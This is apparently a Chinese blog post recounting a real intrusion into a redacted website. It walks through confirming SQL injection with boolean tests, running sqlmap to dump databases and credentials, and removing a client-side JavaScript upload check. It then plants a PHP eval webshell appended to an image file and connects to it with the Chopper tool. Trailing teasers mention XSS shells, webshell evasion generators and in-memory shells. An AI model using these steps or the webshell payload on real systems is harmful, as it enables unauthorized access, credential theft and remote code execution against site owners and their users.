记录一次实战,注入+本地JS绕过拿shell

一颗小胡椒2023-05-04 08:50:50

01 正文

1.找注入点

2.测试是否有注入:


http://xxxxxx/xxxx.php?id=6’ ,没有回显


输入:http://xxxxxx/xxxx.php?id=6 and 1=1 有回显,and 1 = 2没有回显,说明存在注入。

3. 使用sqlmap跑。


sqlmap.py -u “http://xxxxx/xxxx.php?id=6”

发现有注入,然后使用–dbs,–tables,–columns,–dump找出用户名和密码。

4.使用御剑扫描后台。然后进行登录。

我们先上传一个脚本木马试试。

发现有黑名单。先看下是否是本地js校验。右键审查元素,发现是本地js校验。

我们找到表单form,删除相对应的脚本。

5.重新上传php一句话,发现

那么试下图片马

6.将图片使用C32Asm打开,在最后面添加一句话:<?php @ eval ( $_POST [ 'pw' ]); ?>

保存,命名为a.php。然后上传,发现上传成功,使用菜刀连接,密码pw。

js
本作品采用《CC 协议》,转载必须注明作者和本文链接
JShell是一个使用XSS获取JavaScript shell的脚本,基于python。
jsproxy功能特点服务端开销低传统在线代理几乎都是在服务端替换 HTML/JS/CSS 等资源中的 URL。它能让 JS 拦截网页产生的请求,并能自定义返回内容,相当于在浏览器内部实现一个反向代理。API 虚拟化传统在线代理大多只针对静态 URL 的替换,忽视了动态 URL 以及和 URL 相关的网页 API。这可能导致某些业务逻辑出现问题。同时得益于 nginx 丰富的功能,很多常用需求无需重新造轮子,通过简单配置即可实现。并且无论性能还是稳定性,都远高于自己实现。
JSON 是我们日常写代码要看的最多的数据了,服务之间的接口交互几乎都使用 JSON 格式的数据,而一个能够对 JSON 比较好可视化,并直观的去查看数据的工具非常重要。之前我一般是在 Chrome 安装 JSON 解析的插件工具,而今天要推荐的工具就要更强一点了。JSON Visio,一款能够直接将 JSON 渲染成可交互的图形化工具,通过树形结构的形式可以很直观的看到数据的内在逻辑。更多项目详情请查看如下链接。
查看tomcat中间件的\work\Catalina\localhost_\org\apache\jsp 目录,仍然是可以发现这个shell的编译过程中产生的几个文件的,这3个文件攻击者一般不会删除,也不会更改文件的时间属性。
JSON注入入门
2022-04-18 15:09:05
泛星安全团队泛星安全团队第8篇文章声明文章内容为学习记录,请勿利用文章内的相关技术从事非法测试,如因此产生的
它们基于JSON格式,并包含一个令牌签名以确保令牌的完整性。本文主要讨论使用JSON Web令牌的安全隐患,以及攻击者如何利用它们绕过访问控制。有效载荷和签名。
JS未授权访问漏洞
2021-12-20 15:09:49
参加了最近一期的听火沙龙,各位师傅分享了很多有意思的挖洞姿势和议题,根据会后梳理和完善,现以分享交流未授权的一些拙见,各位大师父们如果有更好的意见建议,欢迎评论交流。 第一次访问站点,需要注意多收集接口(多做信息收集),把站点能点的按钮先触发一边,可配合利用谷歌插件FindSomething或BurpJSLinkFinder插件做一些被动接口收集,我习惯用BurpJSLinkFinder。
JSP Webshell的检测工具
2021-12-13 12:04:53
在11月初,我做了一些JSP Webshell的免杀研究,主要参考了三梦师傅开源的代码。然后加入了一些代码混淆手段,编写了一个免杀马生成器JSPHorse,没想到在Github上已收获500+的Star
JSP内存马研究
2021-10-16 07:49:21
最近在研究webshell免杀的问题,到了内存马免杀部分发现传统的Filter或者Servlet查杀手段比较多,不太容易实现免杀,比如有些工具会将所有注册的Servlet和Filter拿出来,排查人员仔细一点还是会被查出来的,所以 我们要找一些其他方式实现的内存马。比如我今天提到的JSP的内存马(虽然本质上也是一种Servlet类型的马) 。
此类问题主要存在于后台登陆页面以及类似网页内引入的JS文件中。根据此类漏洞,说不定登陆页面下引入的js文件暴露的后台路径会成为突破口。因为此类问题利用方式和造成的危害与即将谈论到的第三类问题不同,所以把这类问题单独拿出来讲一讲。部分厂商更是因此降低了对XSS的评级。
一颗小胡椒
暂无描述